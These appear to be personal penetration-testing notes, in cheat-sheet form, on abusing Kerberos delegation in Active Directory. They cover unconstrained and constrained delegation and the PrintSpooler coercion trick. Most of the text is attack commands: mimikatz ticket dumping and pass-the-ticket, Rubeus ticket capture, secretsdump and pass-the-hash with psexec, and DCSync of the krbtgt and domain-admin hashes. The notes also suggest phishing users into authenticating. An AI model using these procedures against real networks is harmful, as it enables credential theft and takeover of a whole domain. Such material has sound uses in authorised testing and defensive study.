Kerberos

Kerberosting

Check the Imported Ticket

klist

after that you can test it with ls

ls \\<target machine>\c$

# to list file in the target machine with imported ticket.

Unconstrained Delegation

User --- authenticates to ---> IIS server ---> authenticates on behalf of the user ---> DB server

Any user authentication (i.e CIFS) to the computer with unconstrained delegation enabled on it, will cache that user's TGT in memory, which can later be dumped and reused by an adversary.

use tool -> powerview.ps1

Get-DomainComputer -Unconstrained
# search for useraccountcontrol : TRUSTED_FOR_DELEGATION
# name : IIS01   (target where saving the TGT in memory)


Get-ADComputer -Filter {TrustedForDelegation -eq $true -and primarygroupid -eq 515} -Properties trustedfordelegation,serviceprincipalname,description

Exploit:

# require administrator

mimikatz
mimikatz# privilege::debug
mimikatz# sekurlsa::tickets

We could wait for user to connect with IIS01 or do phishing attack to force user connect to IIS01.

Then check mimikatz again for TGT in the memory:

After we got OFFENSE.LOCAL/administrator, mean we got the administrator for entire domain.

run this command to export the TGT.

mimikatz::tickets /export

Then import the ticket with mimikatz

kerberos::ptt [0;3c785]-2-0-40e10000-Administrator@krbtgt-OFFENSE.LOCAL.kirbi

PsExec.exe \\dc01 cmd


Enter-PSSession dc01

Note:

# check the imported TGT
klist

Reference:

Active Directory Security Risk #101: Kerberos Unconstrained Delegation (or How Compromise of a Single Server Can Compromise the Domain)Active Directory & Azure AD/Entra ID Security

Constrained Delegation

. .\PowerView.ps1

Get-DomainUser -TrustedToAuth
Get-NetUser -TrustedToAuth

# test this first

Get-DomainComputer -TrustedToAuth

note:

cn (common name) -> current computer name

msds-allowedtodelegateto -> target computer

useraccountcontrol -> TRUSTED_TO_AUTH_FOR_DELEGATION

example: IIS01 allows to contrained delegation to FILE_01

cn                            : IIS01
msds-allowedtodelegateto      : {cifs/file_01.example.local, cifs/file_01}
useraccountcontrol            : TRUSTED_TO_AUTH_FOR_DELEGATION

User has to have an attribute TRUSTED_TO_AUTH_FOR_DELEGATION in order for it to be able to authenticate to the remote service.

TRUSTED_TO_AUTH_FOR_DELEGATION - (Windows 2000/Windows Server 2003) The account is enabled for delegation. This is a security-sensitive setting. Accounts that have this option enabled should be tightly controlled. This setting lets a service that runs under the account assume a client's identity and authenticate as that user to other remote servers on the network.
https://support.microsoft.com/en-gb/help/305144/how-to-use-useraccountcontrol-to-manipulate-user-account-properties

Exploit on the computer that has trusted_to_auth_for_delegation

Rubeus.exe tgtdeleg /nowrap

When get the Base64 rubeus ticket.

# Import Ticket to Kali Linux

# make sure the base64 file is one line.

base64 -d ticket.kirbi.b64 > ticket.kirbi
ticketConverter.py ticket.kirbi ticket.ccache

export KRB5CCNAME=/home/kali/ticket.ccache

crackmapexec smb <target hostname> -k
secretdump.py <domain>/<hostname>\$@<hostname>.<domain> -dc-ip <target ip dc> -no-pass -k

# last step when we have the ntlm hash
psexec.py -hashes <hash>:<hash> administrator@<hostname>

Note:

When access kerberost things, make sure your clock screw is good.

sudo ntpdate -u <ip server that has ntp server>

reference: https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation

DC PrintSpooler

Our environment for this lab is:

ws01 - attacker compromised host with kerberos delegation enabled (attacker, server)
dc01 - domain controller running a print service (victim, target)

check with this

ls \\DC01\pipe\spoolss

dir \\DCO1\pipe\spoolss

Before attack (administrator cmd in breached computer ws01 )

Rubeus.exe monitor /interval:4 /filteruser:DC01$

Then run SpoolSample.exe (cmd.exe) in IIS01

# SpoolSample.exe <target server> <capture server>
SpoolSample.exe DC01 ws01
# return TGT

Rubeus could also import the TGT directly to memory:

Rubeus.exe ptt /ticket:<base64 TGT from rubeus>

We indeed got a TGT for DC01$ computer!

With this, we can make our compromised system ws01$ appear like a Domain Controller and extract an NTLM hash for the user offense\spotless which we know has high privileges in the domain:

# in this case spotless is domain admin user.
mimikatz # lsadump::dcsync /domain:offense.local /user:spotless

mimikatz # lsadump::dcsync /domain:offense.local /user:krbtgt